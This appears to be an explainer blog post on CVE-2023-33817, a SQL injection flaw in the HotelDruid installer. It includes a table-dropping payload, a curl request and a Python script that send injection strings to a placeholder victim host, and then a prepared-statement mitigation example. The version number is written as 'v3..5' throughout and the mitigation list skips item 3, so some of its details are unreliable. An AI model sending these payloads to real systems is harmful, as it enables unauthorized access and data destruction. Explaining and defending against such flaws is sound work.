CVE-2023-33817 - SQL Injection Vulnerability in HotelDruid v3..5 Explained
In mid-2023, a critical security vulnerability was found in HotelDruid, an open-source hotel management system used by thousands of small hotels and bed and breakfasts worldwide. The vulnerability, tracked as CVE-2023-33817, allows hackers to perform a SQL injection attack in HotelDruid version 3..5. This means attackers can gain unauthorized access to your database, extract sensitive information, or even damage the system.
This post breaks down what the vulnerability is, how bad it is, how attackers can exploit it, and what you can do to stay safe. We use simple language and examples, so you don’t have to be a cybersecurity expert to understand.
What is HotelDruid?
HotelDruid is free, open-source hotel management software, popular for reservation management, invoicing, and more. It’s written in PHP and works with MySQL (MariaDB) databases.
What is CVE-2023-33817?
CVE-2023-33817 is an identifier given to a particular SQL injection vulnerability present in HotelDruid v3..5. It was discovered and detailed by security researchers in this report.
A SQL injection happens when user input is not properly checked and cleaned, so hackers can send dangerous SQL queries to the database, potentially leading to data theft or tampering.
Where is the Vulnerability?
The vulnerability is due to improper validation of user input in the include/install.php file in HotelDruid version 3..5.
Specifically, an attacker can inject arbitrary SQL code into database queries by manipulating data submitted to the application installer.
Let’s look at a simplified (fictional, but realistic) code overview:
// (This is for demonstration. The real code may be different)
$user = $_POST['username'];
$pass = $_POST['password'];
$query = "INSERT INTO users (username, password) VALUES ('$user', '$pass')";
mysqli_query($conn, $query);
If $user is not sanitized, an attacker could send admin'); DROP TABLE users; -- as the username, which would result in:
INSERT INTO users (username, password) VALUES ('admin'); DROP TABLE users; --', 'somepassword')
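The DROP TABLE users; part is the malicious addition: where the application executes stacked statements, it can delete your user table! One caveat: PHP's mysqli_query() runs only a single statement per call, so a stacked query like this needs a multi-statement API such as mysqli_multi_query() to execute. The underlying problem is the same either way, because the input has changed the structure of the query instead of being treated as data.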
Exploit Example
Let’s see how a trivial exploit might look using a common web request tool like curl.
Assume a POST parameter username in the installer.
curl -X POST "http://victim.com/hoteldruid/include/install.php" \
  -d "username=attacker' OR 1=1--&password=dummy"
This input could cause the SQL statement to always return true (1=1), allowing the attacker to bypass authentication or extract user lists.
Here’s a basic Python script that automates the attack (for educational purposes only!):
import requests
target_url = 'http://victim.com/hoteldruid/include/install.php'
payload = {
    'username': "admin' -- ",
    'password': 'irrelevant'
}
response = requests.post(target_url, data=payload)
print(response.text)
If the site is vulnerable, this could let the attacker log in as admin or even drop tables in the database.
Mitigation
1. Update Immediately: Always use the latest version of HotelDruid, as later versions may patch known holes.
2. Input Validation: Always sanitize and validate user input. Never trust POST or GET parameters directly.
4. Restrict Installer: Make sure include/install.php cannot be accessed after setup.
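Mitigation item 2 in practice, as an added example rather than HotelDruid's own code: the fictional INSERT from earlier, written once with string concatenation and once with bound parameters. Assumptions: an in-memory SQLite database (through PDO) stands in for MySQL so the script runs offline, and the function names are hypothetical.

```php
<?php
// Added example, not HotelDruid code. Assumptions: an in-memory SQLite
// database (via PDO) stands in for MySQL so the script runs offline, and the
// users table mirrors the article's fictional snippet. Function names are
// hypothetical.
declare(strict_types=1);

function freshDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)');
    return $db;
}

// Vulnerable pattern from the article: input becomes part of the SQL text.
function insertUnsafe(PDO $db, string $user, string $pass): void
{
    $db->exec("INSERT INTO users (username, password) VALUES ('$user', '$pass')");
}

// Hardened pattern: bound parameters are sent as data, never parsed as SQL.
// The password is stored as a hash instead of clear text.
function insertSafe(PDO $db, string $user, string $pass): void
{
    $stmt = $db->prepare('INSERT INTO users (username, password) VALUES (:u, :p)');
    $stmt->execute([':u' => $user, ':p' => password_hash($pass, PASSWORD_DEFAULT)]);
}

// Constructed inputs: a legitimate name with an apostrophe, and the username
// string quoted in the article.
$inputs = ["O'Brien", "admin'); DROP TABLE users; --"];

$db = freshDb();
foreach ($inputs as $name) {
    try {
        insertUnsafe($db, $name, 'somepassword');
        echo "concatenated: accepted ", json_encode($name), PHP_EOL;
    } catch (PDOException $e) {
        // The quote in the input changed the statement's structure, so the
        // database rejected it.
        echo "concatenated: input altered the SQL -> ", $e->getMessage(), PHP_EOL;
    }
}

$db = freshDb();
foreach ($inputs as $name) {
    insertSafe($db, $name, 'somepassword');
}
foreach ($db->query('SELECT username FROM users') as $row) {
    echo "prepared: stored verbatim ", json_encode($row['username']), PHP_EOL;
}
```

Run it with the PHP command-line interpreter; it needs the pdo_sqlite extension. With mysqli, the equivalent calls are prepare(), bind_param() and execute().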
Conclusion
CVE-2023-33817 in HotelDruid v3..5 shows how dangerous SQL injection bugs can be. If you’re running an affected version, you should update immediately and audit your PHP code for similar input validation issues. Never leave installation scripts accessible after deploying web applications — and remember, securing your user data protects your business and your guests!
Timeline
Published on: 06/13/2023 21:15:00 UTC
Last modified on: 06/17/2023 03:12:00 UTC